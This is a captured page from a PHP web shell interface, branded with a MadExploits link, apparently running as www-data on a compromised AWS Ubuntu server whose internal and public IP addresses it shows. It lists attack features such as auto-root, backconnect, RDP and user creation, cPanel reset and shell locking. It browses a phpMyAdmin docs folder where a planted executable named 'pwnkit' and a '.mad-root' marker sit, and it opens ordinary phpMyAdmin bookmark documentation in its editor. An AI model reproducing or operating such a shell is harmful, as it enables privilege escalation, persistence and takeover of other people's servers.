Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.143.228.88
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
_ext
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
.gitignore
44
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
Makefile
7.17
KB
-rw-r--r--
bookmarks.rst
2.41
KB
-rw-r--r--
charts.rst
4.63
KB
-rw-r--r--
conf.py
9.88
KB
-rw-r--r--
config.rst
129.29
KB
-rw-r--r--
copyright.rst
1.6
KB
-rw-r--r--
credits.rst
27.43
KB
-rw-r--r--
developers.rst
380
B
-rw-r--r--
faq.rst
92.52
KB
-rw-r--r--
glossary.rst
14.94
KB
-rw-r--r--
import_export.rst
9.97
KB
-rw-r--r--
index.rst
573
B
-rw-r--r--
intro.rst
2.99
KB
-rw-r--r--
make.bat
6.32
KB
-rw-r--r--
other.rst
916
B
-rw-r--r--
privileges.rst
3.22
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
relations.rst
3.26
KB
-rw-r--r--
require.rst
1.84
KB
-rw-r--r--
security.rst
4.5
KB
-rw-r--r--
settings.rst
1015
B
-rw-r--r--
setup.rst
45.36
KB
-rw-r--r--
themes.rst
2.88
KB
-rw-r--r--
transformations.rst
7.69
KB
-rw-r--r--
two_factor.rst
2.79
KB
-rw-r--r--
user.rst
195
B
-rw-r--r--
vendors.rst
2.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bookmarks.rst
.. _bookmarks: Bookmarks ========= .. note:: You need to have configured the :ref:`linked-tables` for using bookmarks feature. Storing bookmarks ----------------- Any query that is executed can be marked as a bookmark on the page where the results are displayed. You will find a button labeled :guilabel:`Bookmark this query` just at the end of the page. As soon as you have stored a bookmark, that query is linked to the database. You can now access a bookmark dropdown on each page where the query box appears on for that database. Variables inside bookmarks -------------------------- Inside a query, you can also add placeholders for variables. This is done by inserting into the query SQL comments between ``/*`` and ``*/``. The special string ``[VARIABLE{variable-number}]`` is used inside the comments. Be aware that the whole query minus the SQL comments must be valid by itself, otherwise you won't be able to store it as a bookmark. Also, note that the text 'VARIABLE' is case-sensitive. When you execute the bookmark, everything typed into the *Variables* input boxes on the query box page will replace the strings ``/*[VARIABLE{variable-number}]*/`` in your stored query. Also remember, that everything else inside the ``/*[VARIABLE{variable-number}]*/`` string for your query will remain the way it is, but will be stripped of the ``/**/`` chars. So you can use: .. code-block:: mysql /*, [VARIABLE1] AS myname */ which will be expanded to .. code-block:: mysql , VARIABLE1 as myname in your query, where VARIABLE1 is the string you entered in the Variable 1 input box. A more complex example, say you have stored this query: .. code-block:: mysql SELECT Name, Address FROM addresses WHERE 1 /* AND Name LIKE '%[VARIABLE1]%' */ If you wish to enter "phpMyAdmin" as the variable for the stored query, the full query will be: .. code-block:: mysql SELECT Name, Address FROM addresses WHERE 1 AND Name LIKE '%phpMyAdmin%' **NOTE THE ABSENCE OF SPACES** inside the ``/**/`` construct. Any spaces inserted there will be later also inserted as spaces in your query and may lead to unexpected results especially when using the variable expansion inside of a "LIKE ''" expression. Browsing a table using a bookmark --------------------------------- When a bookmark has the same name as the table, it will be used as the query when browsing this table. .. seealso:: :ref:`faqbookmark`, :ref:`faq6_22`
Close